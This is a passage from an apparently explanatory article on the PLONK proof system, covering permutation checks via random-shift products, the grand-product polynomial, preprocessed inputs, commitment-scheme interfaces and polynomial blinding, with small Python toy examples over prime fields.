&lt;p&gt;But the converse is not true. For example the sets $A = \{4, 15\}$ and $B = \{6, 10\}$ both have $60$ as the result of the product of their elements. But they are not equal. So this is not good for checking equality.&lt;&#x2F;p&gt;
&lt;p&gt;Polynomials come to the rescue here. What we can do instead is consider the following sets &lt;em&gt;of polynomials&lt;&#x2F;em&gt; $A’ = \{a_0 + X, a_1 + X\}$, $B’ = \{b_0 + X, b_1 + X \}$. Sets $A$ and $B$ are equal if and only if sets $A’$, and $B’$ are equal. This is because the equality of polynomials boils down to the equality of their coefficients. But the difference between $A’$ and $B’$ is that the approach of multiplying the elements works now. That is, $A’$ and $B’$ are equal if and only if $(a_0 + X)(a_1 + X) = (b_0 + X)(b_1 + X)$. This is not entirely evident but follows from a property that polynomials have called &lt;em&gt;unique factorization&lt;&#x2F;em&gt;. Here the important fact is that linear polynomials act like prime factors. Anyway, you can take that for granted. The last part of this trick is using the Schwartz-Zippel lemma and returning to the land of field elements. That means, if for some random element $\gamma$ we have $(a_0 + \gamma)(a_1 + \gamma) = (b_0 + \gamma)(b_1 + \gamma)$, then with overwhelming probability the equality $(a_0 + X)(a_1 + X) = (b_0 + X)(b_1 + X)$ holds.&lt;&#x2F;p&gt;
&lt;p&gt;Putting this all together, if for some random element $\gamma$ we have $(a_0 + \gamma)(a_1 + \gamma) = (b_0 + \gamma)(b_1 + \gamma)$, then with overwhelming probability the sets $A$ and $B$ are equal. Of course, this also holds for sets with more than two elements. Let’s write that down.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Fact:&lt;&#x2F;em&gt; Let $A = \{a_0, \dots, a_{k-1} \}$ and $B = \{b_0, \dots, b_{k-1} \}$ be sets of field elements. If, for some random $\gamma$ the following equality holds&lt;br &#x2F;&gt;
$$\prod_{i = 0}^{ k - 1}(a_i + \gamma) = \prod_{i = 0}^{ k - 1 }(b_i + \gamma),$$&lt;br &#x2F;&gt;
then with overwhelming probability $A$ is equal to $B$.&lt;&#x2F;p&gt;
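&lt;p&gt;A toy numerical check of this fact, over the small prime field $\mathbb{F}_{101}$ (an arbitrary illustrative choice; real protocols use large fields, where the Schwartz–Zippel failure probability is negligible). For the colliding sets from before, only $\gamma = 0$ fools the randomized check:&lt;&#x2F;p&gt;

```python
p = 101
A = [4, 15]
B = [6, 10]

def shifted_product(gamma, elems):
    # product of (e + gamma) over the set, mod p
    result = 1
    for e in elems:
        result = result * (e + gamma) % p
    return result

# plain products collide: both are 60...
assert shifted_product(0, A) == shifted_product(0, B) == 60
# ...but a random shift exposes the difference: here only gamma = 0
# satisfies (4 + g)(15 + g) = (6 + g)(10 + g) mod 101
collisions = [g for g in range(p) if shifted_product(g, A) == shifted_product(g, B)]
assert collisions == [0]
```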
&lt;p&gt;And here comes the trick that reduces this check to polynomial equations. Let&lt;br &#x2F;&gt;
$H$ be a domain of the form $\{1, \omega, \dots, \omega^{k - 1} \}$ for some primitive $k$-th root of unity $\omega$. Let $f$ and $g$ be the polynomials that interpolate the following values at $H$.&lt;br &#x2F;&gt;
$$(a_0 + \gamma, \dots, a_{k-1} + \gamma),$$&lt;br &#x2F;&gt;
$$(b_0 + \gamma, \dots, b_{k-1} + \gamma),$$&lt;&#x2F;p&gt;
&lt;p&gt;Then $\prod_{i = 0}^{ k - 1}(a_i + \gamma)$ equals $\prod_{ i = 0}^{ k - 1}(b_i + \gamma)$ if and only if there exists a polynomial $Z$ such that&lt;br &#x2F;&gt;
$$Z(\omega^0) = 1$$&lt;br &#x2F;&gt;
$$Z(h)f(h) = g(h)Z(\omega h)$$&lt;br &#x2F;&gt;
for all $h\in H$.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see why. Suppose that $\prod_{i = 0}^{ k - 1}(a_i + \gamma)$ equals $\prod_{i = 0}^{ k - 1}(b_i + \gamma)$. Construct $Z$ as the polynomial that interpolates the following values $$(1, \frac{a_0 + \gamma}{b_0 + \gamma}, \frac{(a_0 + \gamma)(a_1 + \gamma)}{(b_0 + \gamma)(b_1 + \gamma)}, \dots, \prod_{i=0}^{k-2} \frac{a_i + \gamma}{b_i + \gamma}),$$&lt;br &#x2F;&gt;
in the same domain as $f$ and $g$. That works. Conversely, suppose such a polynomial $Z$ exists. By evaluating the equation $Z(X)f(X) = g(X)Z(\omega X)$ at $1, \omega, \dots, \omega^{k-2}$ and using recursion, we get that $Z(\omega^{k-1}) = \prod_{i = 0}^{k - 2}(a_i + \gamma)&#x2F;\prod_{i = 0}^{k - 2}(b_i + \gamma)$. Moreover, evaluating it at $\omega^{k-1}$ we obtain that $$Z(\omega^{k - 1})\frac{f(\omega^{k - 1} )}{g(\omega^{ k - 1 })} = Z(\omega^k ) = Z(\omega^0 ) = 1.$$&lt;br &#x2F;&gt;
The second equality holds because $\omega^k = \omega^0$ since it is a $k$-th root of unity. Expanding with the values of $f, g$ and $Z$ one obtains that $\prod_{i = 0}^{k - 1}(a_i + \gamma)&#x2F;\prod_{i = 0}^{k - 1}(b_i + \gamma)$ equals $1$. Which is what we wanted.&lt;&#x2F;p&gt;
&lt;p&gt;In summary. We proved the following:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Fact:&lt;&#x2F;em&gt; Let $A = \{a_0, \dots, a_{k-1} \}$ and $B = \{b_0, \dots, b_{k-1} \}$ be sets of field elements. Let $\gamma$ be a random field element. Let $\omega$ be a primitive $k$-th root of unity and $H = \{1, \omega, \omega^2, \dots, \omega^{k-1} \}$. Let $f$ and $g$ be respectively the polynomials that interpolate the values $\{a_0 + \gamma, \dots, a_{k-1} + \gamma \}$ and $\{ b_0 + \gamma, \dots, b_{k-1} + \gamma \}$ at $H$. If there exists a polynomial $Z$ such that&lt;br &#x2F;&gt;
$$Z(\omega^0 ) = 1$$&lt;br &#x2F;&gt;
$$Z(h)f(h) = g(h)Z(\omega h)$$&lt;br &#x2F;&gt;
for all $h\in H$, then with overwhelming probability the sets $A$ and $B$ are equal.&lt;&#x2F;p&gt;
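&lt;p&gt;The running product $Z$ is easy to see in numbers. Here is a sketch over the toy field $\mathbb{F}_{17}$, where $\omega = 4$ is a primitive $4$-th root of unity; $B$ is a reordering of $A$, so the defining relation holds on all of $H$, including the wrap-around step:&lt;&#x2F;p&gt;

```python
p = 17
k = 4
omega = 4  # primitive 4th root of unity mod 17: 4^4 = 256 = 1 (mod 17)

def inv(x):
    # modular inverse via Fermat's little theorem
    return pow(x, p - 2, p)

gamma = 5
A = [2, 7, 11, 3]
B = [11, 3, 2, 7]  # a reordering of A
f = [(a + gamma) % p for a in A]  # f(omega^i) = a_i + gamma
g = [(b + gamma) % p for b in B]  # g(omega^i) = b_i + gamma

# Z(omega^0) = 1 and Z(omega^{i+1}) = Z(omega^i) * f_i / g_i
Z = [1]
for i in range(k - 1):
    Z.append(Z[-1] * f[i] * inv(g[i]) % p)

# Z(h) f(h) = g(h) Z(omega h) holds on all of H, including the
# wrap-around step from omega^{k-1} back to omega^0 = 1
for i in range(k):
    assert Z[i] * f[i] % p == g[i] * Z[(i + 1) % k] % p
```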
&lt;h4 id=&quot;sets-of-tuples&quot;&gt;Sets of tuples&lt;&#x2F;h4&gt;
&lt;p&gt;In the previous section, we saw how to check whether two sets of field elements are equal using polynomial equations. To use it in our context, we need to extend it to sets of tuples of field elements. This is pretty straightforward.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s start with the easy case. Let $A = \{(a_0, a_1), (a_2, a_3) \}$ and $B = \{(b_0, b_1), (b_2, b_3)\}$ be two sets of pairs of field elements. That is, $a_i, b_i \in \mathbb{F}$ for all $i$. The trick is very similar to the one in the previous section. Consider the sets of polynomials in two variables&lt;br &#x2F;&gt;
$$A’ = \{a_0 + a_1 Y + X, a_2 + a_3 Y + X \}$$&lt;br &#x2F;&gt;
$$B’ = \{b_0 + b_1 Y + X, b_2 + b_3 Y + X \}$$&lt;&#x2F;p&gt;
&lt;p&gt;Just as before, by looking at coefficients, we can see that the sets $A$ and $B$ are equal if and only if $A’$ and $B’$ are equal.&lt;br &#x2F;&gt;
And notice that these are sets of polynomials: we got rid of the tuples! Now, the situation is very similar to the previous section. We have that $A’$ and $B’$ are equal if and only if the product of their elements coincides. This is also true because polynomials in two variables are a unique factorization domain. So as before, we can use the Schwartz-Zippel lemma. Precisely, if for random $\beta, \gamma$, the elements&lt;br &#x2F;&gt;
$$(a_0 + \beta a_1 + \gamma)(a_2 + \beta a_3 + \gamma),$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$(b_0 + \beta b_1 + \gamma)(b_2 + \beta b_3 + \gamma)$$&lt;br &#x2F;&gt;
coincide, then $A$ and $B$ are equal with overwhelming probability.&lt;&#x2F;p&gt;
&lt;p&gt;Here is the statement for sets of more than two pairs of field elements.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Fact:&lt;&#x2F;em&gt; Let $A = \{\bar a_0, \dots, \bar a_{k-1} \}$ and $B = \{\bar b_0, \dots, \bar b_{k-1} \}$ be sets of pairs of field elements. So that $\bar a_i = (a_{i,0}, a_{i,1})$, and the same for $\bar b_i$. Let $\beta, \gamma$ be random field elements. Let $\omega$ be a primitive $k$-th root of unity and $H = \{1, \omega, \omega^2, \dots, \omega^{k-1} \}$. Let $f$ and $g$ be, respectively, the polynomials that interpolate the values&lt;br &#x2F;&gt;
$$\{a_{0,0} + a_{0,1}\beta + \gamma, \dots, a_{k-1,0} + a_{k-1,1}\beta + \gamma\},$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$\{b_{0,0} + b_{0,1}\beta + \gamma, \dots, b_{k-1,0} + b_{k-1,1}\beta + \gamma\},$$&lt;br &#x2F;&gt;
at $H$. If there exists a polynomial $Z$ such that&lt;br &#x2F;&gt;
$$Z(\omega^0 ) = 1$$&lt;br &#x2F;&gt;
$$Z(h)f(h) = g(h)Z(\omega h)$$&lt;br &#x2F;&gt;
for all $h\in H$, then with overwhelming probability the sets $A$ and $B$ are equal.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;going-back-to-our-case&quot;&gt;Going back to our case&lt;&#x2F;h4&gt;
&lt;p&gt;Recall we want to rephrase condition (2) in terms of polynomials. We have already seen that condition (2) is equivalent to $A$ and $B$ being equal, where&lt;br &#x2F;&gt;
$$A = \{((i,j), T_{i,j}): (i,j) \in I\}$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}.$$&lt;&#x2F;p&gt;
&lt;p&gt;We cannot directly use the facts of the previous sections because our sets are not sets of field elements, nor are they sets of pairs of field elements. They are sets of pairs with an index pair $(i,j)$ in the first coordinate and a field element $v$ in the second one. So the solution is to convert them to sets of pairs of field elements and apply the result of the previous section. How do we map an element of the form $((i,j), v)$ to something of the form $(a_0, a_1)$ with $a_0$ and $a_1$ field elements? The second coordinate is trivial: we can leave $v$ as it is and take $a_1 = v$. There are multiple options for the index pair $(i,j)$. The important thing to achieve here is that different pairs get mapped to different field elements. Recall that $i$ ranges from $0$ to $N-1$ and $j$ ranges from $0$ to $2$. One way is to take a primitive $3N$-th root of unity $\eta$ and define $a_0 = \eta^{3i + j}$. Putting it all together, we are mapping the pair $((i,j), v)$ to the pair $(\eta^{3i + j}, v)$, which is a pair of field elements. Now we can consider the sets&lt;br &#x2F;&gt;
$$A = \{(\eta^{3i + j}, T_{i,j}): (i,j) \in I\}$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$B = \{(\eta^{3k + l}, T_{i,j}): (i,j) \in I, \sigma((i,j)) = (k, l)\}.$$&lt;br &#x2F;&gt;
We have that condition (2) is equivalent to $A$ and $B$ being equal.&lt;&#x2F;p&gt;
&lt;p&gt;Applying the method of the previous section to these sets, we obtain the following.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Fact:&lt;&#x2F;em&gt; Let $\eta$ be a primitive $3N$-th root of unity and $\beta$ and $\gamma$ random field elements. Let $D = \{1, \eta, \eta^2, \dots, \eta^{3N-1}\}$. Let $f$ and $g$ be the polynomials that interpolate, respectively, the following values at $D$:&lt;br &#x2F;&gt;
$$\{T_{i,j} + \eta^{3i + j}\beta + \gamma: (i,j) \in I\},$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$\{T_{i,j} + \eta^{3k + l}\beta + \gamma: (i,j) \in I, \sigma((i,j)) = (k,l)\},$$&lt;br &#x2F;&gt;
Suppose there exists a polynomial $Z$ such that&lt;br &#x2F;&gt;
$$Z(\eta^0 ) = 1$$&lt;br &#x2F;&gt;
$$Z(d)f(d) = g(d)Z(\eta d),$$&lt;br &#x2F;&gt;
for all $d\in D$.&lt;br &#x2F;&gt;
Then the sets $A = \{((i,j), T_{i,j}): (i,j) \in I \}$ and $B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}$ are equal with overwhelming probability.&lt;&#x2F;p&gt;
&lt;p&gt;One last-minute definition. Notice that $\omega=\eta^3$ is a primitive $N$-th root of unity. Let $H = \{1, \omega, \omega^2, \dots, \omega^{N-1}\}$.&lt;&#x2F;p&gt;
&lt;p&gt;Define $S_{\sigma 1}$ to be the interpolation at $H$ of&lt;br &#x2F;&gt;
$$\{\eta^{3k + l}: (i,0) \in I, \sigma((i,0)) = (k,l)\},$$&lt;br &#x2F;&gt;
Similarly define $S_{\sigma 2}$ and $S_{\sigma 3}$ to be the interpolation at $H$ of the sets of values&lt;br &#x2F;&gt;
$$\{\eta^{3k + l}: (i,1) \in I, \sigma((i,1)) = (k,l)\},$$&lt;br &#x2F;&gt;
$$\{\eta^{3k + l}: (i,2) \in I, \sigma((i,2)) = (k,l)\}.$$&lt;br &#x2F;&gt;
These will be useful during the protocol to work with such polynomials $Z$ and the above equations.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;a-more-compact-form&quot;&gt;A more compact form&lt;&#x2F;h4&gt;
&lt;p&gt;The last fact is equivalent to the following. There’s no new idea here, just a more compact form of the same thing that allows the polynomial $Z$ to be of degree at most $N$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Fact:&lt;&#x2F;em&gt; Let $\omega$ be a primitive $N$-th root of unity. Let $H = \{1, \omega, \omega^2, \dots, \omega^{N-1}\}$. Let $k_1$ and $k_2$ be two field elements such that the cosets $H$, $k_1H$, and $k_2H$ are pairwise disjoint. Let $\beta$ and $\gamma$ be random field elements. Let $f$ and $g$ be the polynomials that interpolate, respectively, the following values at $H$:&lt;br &#x2F;&gt;
$$\{(T_{i,0} + \omega^{i} \beta + \gamma) (T_{i,1} + \omega^{i} k_1 \beta + \gamma) (T_{i,2} + \omega^{i} k_2\beta + \gamma): 0\leq i&amp;lt;N\},$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$\{(T_{i,0} + S_{\sigma1}(\omega^i)\beta + \gamma)(T_{i,1} + S_{\sigma2}(\omega^i)\beta + \gamma)(T_{i,2} + S_{\sigma3}(\omega^i)\beta + \gamma): 0\leq i&amp;lt;N\}.$$&lt;br &#x2F;&gt;
Suppose there exists a polynomial $Z$ such that&lt;br &#x2F;&gt;
$$Z(\omega^0) = 1$$&lt;br &#x2F;&gt;
$$Z(d)f(d) = g(d)Z(\omega d),$$&lt;br &#x2F;&gt;
for all $d\in H$.&lt;br &#x2F;&gt;
Then the sets $A = \{((i,j), T_{i,j}): (i,j) \in I\}$ and $B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}$ are equal with overwhelming probability.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;common-preprocessed-input&quot;&gt;Common preprocessed input&lt;&#x2F;h2&gt;
&lt;p&gt;We have arrived at the eight polynomials we mentioned at the beginning:&lt;br &#x2F;&gt;
$$q_L, q_R, q_M, q_O, q_C, S_{\sigma 1}, S_{\sigma 2}, S_{\sigma 3}.$$&lt;&#x2F;p&gt;
&lt;p&gt;These are what’s called the &lt;em&gt;common preprocessed input&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;wrapping-up-the-whole-thing&quot;&gt;Wrapping up the whole thing&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s wrap up what we have so far. We started with a program. It can be seen as a sequence of gates with left, right, and output values. That’s called a circuit. From this, two matrices, $Q$ and $V$, can be computed to capture the gate logic.&lt;&#x2F;p&gt;
&lt;p&gt;Executing the circuit leaves us with matrices $T$ and $PI$, called the trace matrix and the public input matrix, respectively. Everything we want to prove boils down to verifying that such matrices are valid. And we have the following result.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Fact:&lt;&#x2F;strong&gt; Let $T$ be an $N \times 3$ matrix with columns $A, B, C$ and $PI$ an $N \times 1$ matrix. They correspond to a valid execution instance with public input given by $PI$ if and only if&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} + PI_i = 0,$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k,l}$ we have $T_{i,j} = T_{k,l}$,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $PI_i = 0$ for all $i&amp;gt;n$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
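&lt;p&gt;Condition 1 can be checked row by row. The following Python sketch runs the check for a hypothetical three-gate circuit (a public-input gate, a multiplication, and an addition) over a toy field:&lt;&#x2F;p&gt;

```python
# Toy check of condition 1 above: every row of the trace must satisfy
# A_i qL_i + B_i qR_i + A_i B_i qM_i + C_i qO_i + qC_i + PI_i = 0.
# The circuit is hypothetical: it computes out = pub * 3 + 2 with pub = 5.
P = 97

# columns of Q: (qL, qR, qM, qO, qC) per gate
Q = [
    (-1, 0, 0, 0, 0),   # public input gate: -A_0 + PI_0 = 0
    (0, 0, 1, -1, 0),   # multiplication:     A_1*B_1 - C_1 = 0
    (1, 1, 0, -1, 0),   # addition:           A_2 + B_2 - C_2 = 0
]
# trace columns A, B, C and the public input column PI
A, B, C = [5, 5, 15], [0, 3, 2], [0, 15, 17]
PI = [5, 0, 0]

def row_ok(i):
    qL, qR, qM, qO, qC = Q[i]
    return (A[i]*qL + B[i]*qR + A[i]*B[i]*qM + C[i]*qO + qC + PI[i]) % P == 0

assert all(row_ok(i) for i in range(3))
```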
&lt;p&gt;Then we constructed polynomials $q_L, q_R, q_M, q_O, q_C, S_{\sigma1},S_{\sigma2}, S_{\sigma3}$, $f$, $g$ from the matrices $Q$ and $V$. They result from interpolating at a domain $H = \{1, \omega, \omega^2, \dots, \omega^{N-1}\}$ for some primitive $N$-th root of unity $\omega$ and a few random values. We also constructed polynomials $a,b,c, pi$ from the matrices $T$ and $PI$. The above fact can be reformulated in terms of polynomial equations as follows.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Fact:&lt;&#x2F;strong&gt; Let $z_H = X^N - 1$. Let $T$ be an $N \times 3$ matrix with columns $A, B, C$ and $PI$ an $N \times 1$ matrix. They correspond to a valid execution instance with public input given by $PI$ if and only if&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. There is a polynomial $t_1$ such that the following equality holds $$a q_L + b q_R + a b q_M + c q_O + q_C + pi = z_H t_1,$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. There are polynomials $t_2, t_3$, $z$ such that $zf - gz&amp;#39; = z_H t_2$ and $(z-1)L_1 = z_H t_3$, where $z&amp;#39;(X) = z(X\omega)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;You might be wondering where the polynomials $t_i$ came from. Recall that for a polynomial $F$, we have $F(h) = 0$ for all $h \in H$ if and only if $F = z_H t$ for some polynomial $t$.&lt;&#x2F;p&gt;
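&lt;p&gt;This divisibility fact is easy to check computationally: dividing by $z_H = X^N - 1$ just folds each coefficient of $X^{N+k}$ down onto $X^k$. A toy sketch with hypothetical small parameters:&lt;&#x2F;p&gt;

```python
# Sanity check of the divisibility fact: a polynomial F vanishes on
# H = {1, w, ..., w^(N-1)} exactly when X^N - 1 divides it. We divide by
# X^N - 1 over a toy prime field and compare with the evaluations on H.
P, N, W = 13, 4, 8            # 8 is a primitive 4th root of unity mod 13

def poly_eval(f, x):
    acc = 0
    for c in reversed(f):     # f[k] is the coefficient of X^k
        acc = (acc * x + c) % P
    return acc

def divmod_by_zH(f):
    """Divide f by X^N - 1; returns (quotient, remainder)."""
    f, q = list(f), []
    while len(f) > N:
        c = f.pop()           # leading coefficient, of degree len(f)
        q.append(c)
        f[len(f) - N] = (f[len(f) - N] + c) % P   # X^N folds down to 1
    return q[::-1], f

# F = (X^N - 1)(2X + 3) vanishes on H; coefficients are little-endian
F = [-3 % P, -2 % P, 0, 0, 3, 2]
t, r = divmod_by_zH(F)
assert all(poly_eval(F, pow(W, k, P)) == 0 for k in range(N))
assert all(c == 0 for c in r) and t == [3, 2]   # quotient is 2X + 3
```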
&lt;p&gt;Finally, conditions 1 and 2 are together equivalent to a single equation if we let more randomness come into play. This is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Let $\alpha$ be a random field element. There is a polynomial $t$ such that  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
z_H t &amp;amp;= a q_L + b q_R + a b q_M + c q_O + q_C + pi \newline&lt;br &#x2F;&gt;
&amp;amp;\quad + \alpha(fz - gz’) \newline&lt;br &#x2F;&gt;
&amp;amp;\quad + \alpha^2(z-1)L_1 \newline&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;This last step is not obvious. You can check the paper to see the proof. Anyway, this is the equation you’ll recognize below in the protocol description.&lt;&#x2F;p&gt;
&lt;p&gt;Randomness is a delicate matter, and an essential part of the protocol is where it comes from, who chooses it, and when they choose it. We are now ready to jump into the protocol.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;protocol&quot;&gt;Protocol&lt;&#x2F;h2&gt;
&lt;h2 id=&quot;details-and-tricks&quot;&gt;Details and tricks&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;polynomial-commitment-scheme&quot;&gt;Polynomial commitment scheme&lt;&#x2F;h3&gt;
&lt;p&gt;A polynomial commitment scheme (PCS) is a cryptographic tool that allows one party to commit to a polynomial and later prove some properties of that polynomial.&lt;br &#x2F;&gt;
The commitment hides the original polynomial’s coefficients and can be publicly shared without revealing any information about the original polynomial.&lt;br &#x2F;&gt;
Later, the party can use the commitment to prove specific properties of the polynomial, such as that it satisfies certain constraints or evaluates to a particular value at a specific point.&lt;&#x2F;p&gt;
&lt;p&gt;For the moment, we only need the following about it:&lt;&#x2F;p&gt;
&lt;p&gt;It consists of a finite group $\mathbb{G}$ and the following algorithms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Commit($f$)** : This algorithm takes a polynomial $f$ and produces an element of the group $\mathbb{G}$. It is called the commitment of $f$ and is denoted by $[f]$. It is homomorphic in the sense that $[f + g] = [f] + [g]$. The former sum is the addition of polynomials. The latter is the addition operation in the group $\mathbb{G}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Open($f$,$\zeta$)** : It takes a polynomial $f$ and a field element $\zeta$ and produces an element $\pi$ of the group $\mathbb{G}$. This element is an opening proof for $f(\zeta)$. It is the proof that $f$ evaluated at $\zeta$ gives $f(\zeta)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Verify($[f]$, $\pi$, $\zeta$, $y$)** : It takes group elements $[f]$ and $\pi$, and also field elements $\zeta$ and $y$. With overwhelming probability, it outputs _Accept_ if $f(\zeta)=y$ and _Reject_ otherwise.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
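&lt;p&gt;To fix the shape of this interface, here is an intentionally insecure Python mock: the “commitment” is the coefficient vector itself, which is additively homomorphic but hides nothing. A real instantiation (KZG, an IPA-based scheme, etc.) would replace all three functions; everything below is illustrative only.&lt;&#x2F;p&gt;

```python
# Intentionally insecure mock of the PCS interface, just to make the three
# algorithms and the homomorphic property concrete. Here a "commitment" is
# the (reduced) coefficient tuple, and an "opening proof" is the value itself.
P = 97

def commit(f):                      # [f]: here, just the reduced coefficients
    return tuple(c % P for c in f)

def add_commitments(cf, cg):        # the group operation on G
    n = max(len(cf), len(cg))
    cf, cg = cf + (0,) * (n - len(cf)), cg + (0,) * (n - len(cg))
    return tuple((a + b) % P for a, b in zip(cf, cg))

def poly_eval(f, x):
    acc = 0
    for c in reversed(f):
        acc = (acc * x + c) % P
    return acc

def open_at(f, zeta):               # "opening proof": here, the value itself
    return poly_eval(f, zeta)

def verify(cf, proof, zeta, y):     # re-evaluates the committed polynomial
    return poly_eval(list(cf), zeta) == y % P and proof == y % P

f, g, zeta = [1, 2, 3], [4, 0, 5, 6], 10
fg = [1 + 4, 2 + 0, 3 + 5, 6]       # f + g as polynomials
assert add_commitments(commit(f), commit(g)) == commit(fg)   # [f+g]=[f]+[g]
assert verify(commit(f), open_at(f, zeta), zeta, poly_eval(f, zeta))
```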
&lt;p&gt;By changing the PCS, you can get different versions of PLONK, each with its advantages and disadvantages (such as shorter proofs, plausible post-quantum security, or no trusted setup).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;blindings&quot;&gt;Blindings&lt;&#x2F;h3&gt;
&lt;p&gt;As you will see in the protocol, the prover reveals the value taken by a bunch of the polynomials at a random $\zeta$. For the protocol to be &lt;em&gt;Honest Verifier Zero Knowledge&lt;&#x2F;em&gt; , these polynomials must be &lt;em&gt;blinded&lt;&#x2F;em&gt;. This process makes the values of these polynomials at $\zeta$ seemingly random by forcing them to be of a certain degree. Here’s how it works.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s take, for example, the polynomial $a$ the prover constructs. This results from interpolating the first column of the trace matrix $T$ at the domain $H$.&lt;br &#x2F;&gt;
This matrix has all of the left operands of all the gates. The prover wishes to keep them secret.&lt;br &#x2F;&gt;
Say the trace matrix $T$ has $N$ rows, and so $H$ is $\{1, \omega,\omega^2, \dots, \omega^{N-1} \}$. The invariant that the prover cannot violate is that $a_{\text{blinded}}(\omega^i)$ must take the value $T_{i, 0}$, for all $i$. This is what the interpolation polynomial $a$ satisfies, and it is the unique such polynomial of degree at most $N-1$ with this property. But for higher degrees, there are many such polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;em&gt;blinding&lt;&#x2F;em&gt; process takes $a$ and a desired degree $M\geq N$ and produces a new polynomial $a_{\text{blinded}}$ of degree exactly $M$. This new polynomial satisfies $a_{\text{blinded}}(\omega^i) = a(\omega^i)$ for all $i$, but outside $H$ it differs from $a$.&lt;&#x2F;p&gt;
&lt;p&gt;This may seem hard, but it’s very simple. Let $z_H$ be the polynomial $z_H = X^N - 1$. If $M=N+k$, with $k\geq 0$, then sample random values $b_0, \dots, b_k$ and define&lt;br &#x2F;&gt;
$$ a_{\text{blinded}} := (b_0 + b_1 X + \cdots + b_k X^k)z_H + a $$&lt;&#x2F;p&gt;
&lt;p&gt;This does the job because $z_H(\omega^i)=0$ for all $i$. Therefore the added term vanishes at $H$ and leaves the values of $a$ at $H$ unchanged.&lt;&#x2F;p&gt;
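&lt;p&gt;A numeric sanity check of the construction, with hypothetical toy parameters ($N = 4$ over $\mathbb F_{13}$): the blinded polynomial agrees with $a$ on $H$ and differs somewhere outside it.&lt;&#x2F;p&gt;

```python
# Toy check of the blinding construction: a_blinded = (b0 + b1 X)·z_H + a
# agrees with a on H but differs outside it (hypothetical instance).
import random

P, N, W = 13, 4, 8                 # 8 is a primitive 4th root of unity mod 13

def poly_eval(f, x):
    acc = 0
    for c in reversed(f):
        acc = (acc * x + c) % P
    return acc

def poly_add(f, g):
    n = max(len(f), len(g))
    f, g = f + [0] * (n - len(f)), g + [0] * (n - len(g))
    return [(a + b) % P for a, b in zip(f, g)]

def poly_mul(f, g):
    out = [0] * (len(f) + len(g) - 1)
    for i, a in enumerate(f):
        for j, b in enumerate(g):
            out[i + j] = (out[i + j] + a * b) % P
    return out

a = [7, 1, 0, 5]                   # some degree-3 polynomial, little-endian
z_H = [-1 % P] + [0] * (N - 1) + [1]          # X^N - 1
b0, b1 = random.randrange(1, P), random.randrange(1, P)
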